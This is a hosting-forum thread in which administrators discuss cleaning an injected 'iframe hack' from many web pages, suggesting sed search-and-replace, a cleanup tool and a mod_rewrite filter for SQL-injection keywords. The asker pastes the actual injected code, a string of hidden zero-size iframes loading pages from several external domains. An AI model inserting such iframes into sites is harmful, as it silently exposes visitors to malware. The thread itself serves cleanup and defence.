How can you remove the iframe hack server wide?

WebHostPro

Well-Known Member
PartnerNOC
Jul 28, 2002
1,724
27
328
LA, Costa RIca
cPanel Access Level
Root Administrator
Twitter
I have a domain with hundreds of pages infected with the iframe hack. I need a find and replace command to remove them all.

Anyone know of I can possibly do this?

I tried all the suggestions on this forum and none have worked. I had simple script years ago but I can't find it unfortunately anymore.

Thanks
 

javiercampos

Well-Known Member
PartnerNOC
Jan 12, 2010
48
0
56
/tmp
cPanel Access Level
Root Administrator
I have a domain with hundreds of pages infected with the iframe hack. I need a find and replace command to remove them all.

Anyone know of I can possibly do this?

I tried all the suggestions on this forum and none have worked. I had simple script years ago but I can't find it unfortunately anymore.

Thanks
hi
everything good writing is translated by google hehe, since I'm from chile and handling not much English but I want to help.

looks good would recommend you first remove the general iframe mind are embedded in the index when you delete, change the access codes and install this application

Installation » Anti-Gumblar
 

Data 1

Well-Known Member
May 25, 2008
113
0
66
Columbus Ohio
cPanel Access Level
DataCenter Provider
I have a domain with hundreds of pages infected with the iframe hack. I need a find and replace command to remove them all.

Anyone know of I can possibly do this?

I tried all the suggestions on this forum and none have worked. I had simple script years ago but I can't find it unfortunately anymore.

Thanks

Depends on the hack. I have a file I found on the internet that cleans GNU-GPL and others with a few text changes, but to get it to work I have to make all the files writable. What I have been doing is making everything writable, running the fix file, download the directory to my computer (doubles as a virus checker also), deleting the files on the server and re uploading to reset permissions. I know it's a kludge but it has been working great. You will have to e-mail me for the file unless management don't mind me posting it here.
 

ModServ

Well-Known Member
Oct 17, 2006
337
5
168
Egypt
cPanel Access Level
Root Administrator
I tried this in httpd.conf but don't know if its working good or now

Code:
RewriteCond %{QUERY_STRING}    ^.*(;|<|>|'|"|\)|%0A|%0D|%22|%27|%3C|%3E|%00).*(/\*|union|select|insert|cast|set|declare|drop|update|md5|benchmark).* [NC]
RewriteRule .* - [F]
But after that I didn't suffer from iframe.
 

thewebhosting

Well-Known Member
May 9, 2008
1,201
1
68
I have a domain with hundreds of pages infected with the iframe hack. I need a find and replace command to remove them all.

Anyone know of I can possibly do this?

I tried all the suggestions on this forum and none have worked. I had simple script years ago but I can't find it unfortunately anymore.

Thanks
Kindly check the below mentioned URL which might helps you to solve your issue:

How I used the Unix command line to do a multi-file search and replace to fix over 4,700 individual files - Gabriel - Web Design, Development and Business … infopoet
 

WebHostPro

Well-Known Member
PartnerNOC
Jul 28, 2002
1,724
27
328
LA, Costa RIca
cPanel Access Level
Root Administrator
Twitter
hi
everything good writing is translated by google hehe, since I'm from chile and handling not much English but I want to help.

looks good would recommend you first remove the general iframe mind are embedded in the index when you delete, change the access codes and install this application

Installation » Anti-Gumblar
I did this but I don't know what do after it's installed. How do I run it to remove the thousands of pages infected?

Or is this just to prevent it?

Also here is the code of this helps:

<iframe src=\"http://odmarco.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://odmarco.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://odile-marco.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://odile-marco.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://odile-marco.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://odile-marco.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://fuadrenal.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://fuadrenal.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://reycross.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://reycross.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://davtraff.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://davtraff.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://odile-marco.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://odile-marco.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://odile-marco.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://odile-marco.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
 
Last edited:

rnawky

Member
Jan 13, 2010
20
0
51
I have a domain with hundreds of pages infected with the iframe hack. I need a find and replace command to remove them all.

Anyone know of I can possibly do this?

I tried all the suggestions on this forum and none have worked. I had simple script years ago but I can't find it unfortunately anymore.

Thanks
Try using the sed command combined with find and xargs.

Find and Replace with Sed